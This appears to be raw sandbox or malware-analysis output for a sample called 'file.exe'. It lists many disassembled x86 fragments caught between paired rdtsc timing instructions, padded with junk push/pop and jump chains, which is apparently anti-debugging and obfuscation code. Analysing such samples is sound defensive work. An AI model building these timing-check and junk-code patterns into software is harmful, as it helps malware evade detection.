Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCA292 second address: BCA2C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7245h 0x00000007 pushad 0x00000008 jmp 00007F35AD0C7240h 0x0000000d jbe 00007F35AD0C7236h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCEEB4 second address: BCEECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 je 00007F35AD45B556h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f jng 00007F35AD45B55Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1DA1 second address: BD1DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD48B5 second address: BD48BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98620 second address: B98631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD0C723Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98631 second address: B98644 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jns 00007F35AD45B556h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9874F second address: B9876E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7247h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98B79 second address: B98BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F35AD45B55Fh 0x0000000a popad 0x0000000b xor dword ptr [esp], 39C83A41h 0x00000012 mov dword ptr [ebp+122D542Dh], eax 0x00000018 call 00007F35AD45B559h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98BAA second address: B98BB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98BB0 second address: B98BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98C7B second address: B98C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B98E7C second address: B98E80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99323 second address: B9932D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F35AD0C7236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B997A1 second address: B997A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B997A5 second address: B997AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B997AB second address: B997B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B997B2 second address: B997E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1ABAh], ecx 0x00000010 lea eax, dword ptr [ebp+1248F27Bh] 0x00000016 jne 00007F35AD0C7236h 0x0000001c nop 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F35AD0C7240h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B997E2 second address: B997E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B997E6 second address: B75E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F35AD0C7238h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 jmp 00007F35AD0C7245h 0x00000016 pop eax 0x00000017 nop 0x00000018 jmp 00007F35AD0C7248h 0x0000001d call dword ptr [ebp+122D3094h] 0x00000023 push esi 0x00000024 jmp 00007F35AD0C7241h 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F35AD0C7241h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD80E3 second address: BD80E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8392 second address: BD839C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F35AD0C7236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAB06 second address: BDAB2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B563h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F35AD45B562h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAB2F second address: BDAB4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7248h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDDBA6 second address: BDDBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDDBAA second address: BDDBB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD5DA second address: BDD5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD5DE second address: BDD5E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD5E4 second address: BDD603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F35AD45B566h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD8BC second address: BDD8C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B59EDA second address: B59EF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F35AD45B567h 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0FD9 second address: BE0FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C723Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0FEC second address: BE100F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F35AD45B55Bh 0x0000000d jbe 00007F35AD45B55Ch 0x00000013 jno 00007F35AD45B556h 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE1450 second address: BE145A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F35AD0C7236h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE145A second address: BE1463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE1463 second address: BE1469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE44F3 second address: BE44F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE44F7 second address: BE452D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F35AD0C7260h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE452D second address: BE4537 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F35AD45B55Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4537 second address: BE4540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4DDD second address: BE4DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007F35AD45B567h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE954F second address: BE9553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE9553 second address: BE9574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B563h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F35AD45B556h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE9574 second address: BE9580 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnl 00007F35AD0C7236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE9580 second address: BE9587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE96AE second address: BE96B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99139 second address: B9913D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9913D second address: B99147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99147 second address: B99167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F35AD45B562h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99167 second address: B99179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD0C723Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B99179 second address: B991EF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F35AD45B556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d call 00007F35AD45B564h 0x00000012 mov ecx, edi 0x00000014 pop edx 0x00000015 mov ebx, dword ptr [ebp+1248F2BAh] 0x0000001b push eax 0x0000001c jnl 00007F35AD45B557h 0x00000022 pop edx 0x00000023 and edi, dword ptr [ebp+122D3554h] 0x00000029 add eax, ebx 0x0000002b jmp 00007F35AD45B561h 0x00000030 nop 0x00000031 push esi 0x00000032 jmp 00007F35AD45B566h 0x00000037 pop esi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F35AD45B55Eh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE9810 second address: BE9818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE99BB second address: BE99C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE99C0 second address: BE99F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F35AD0C7236h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnl 00007F35AD0C7242h 0x00000014 pushad 0x00000015 jmp 00007F35AD0C7241h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE99F4 second address: BE9A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F35AD45B556h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA442 second address: BEA44B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA44B second address: BEA456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEA456 second address: BEA45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF00E7 second address: BF00EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF0255 second address: BF0265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C723Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF068A second address: BF06AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B565h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F35AD45B55Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF06AF second address: BF06B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF1981 second address: BF1987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF1987 second address: BF1993 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007F35AD0C7236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF678E second address: BF67A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD45B55Dh 0x00000009 jnc 00007F35AD45B556h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF57C0 second address: BF57C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF596D second address: BF599E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B565h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jbe 00007F35AD45B556h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007F35AD45B558h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF599E second address: BF59AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF59AA second address: BF59B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5B07 second address: BF5B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C723Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5B24 second address: BF5B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F35AD45B556h 0x0000000f jc 00007F35AD45B556h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5B3B second address: BF5B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5B40 second address: BF5B63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F35AD45B568h 0x00000008 jne 00007F35AD45B556h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5CA7 second address: BF5CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5CAD second address: BF5CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5CB1 second address: BF5CD2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F35AD0C724Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5CD2 second address: BF5CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E42 second address: BF5E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F35AD0C7236h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E4E second address: BF5E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E52 second address: BF5E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E56 second address: BF5E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F35AD45B556h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E6A second address: BF5E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F35AD0C7236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E74 second address: BF5E80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E80 second address: BF5E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7242h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5E96 second address: BF5EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B561h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5EAB second address: BF5EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5EB1 second address: BF5EDD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F35AD45B55Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F35AD45B568h 0x0000000f jc 00007F35AD45B556h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF5EDD second address: BF5EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6049 second address: BF6050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAC21 second address: BFAC25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAC25 second address: BFAC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAC2D second address: BFAC4D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F35AD0C7238h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F35AD0C7242h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFAC4D second address: BFAC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02E37 second address: C02E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7249h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02E58 second address: C02E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02E68 second address: C02E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02E6C second address: C02E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnc 00007F35AD45B556h 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02E7A second address: C02E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01019 second address: C01024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F35AD45B556h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01301 second address: C01305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01305 second address: C01309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
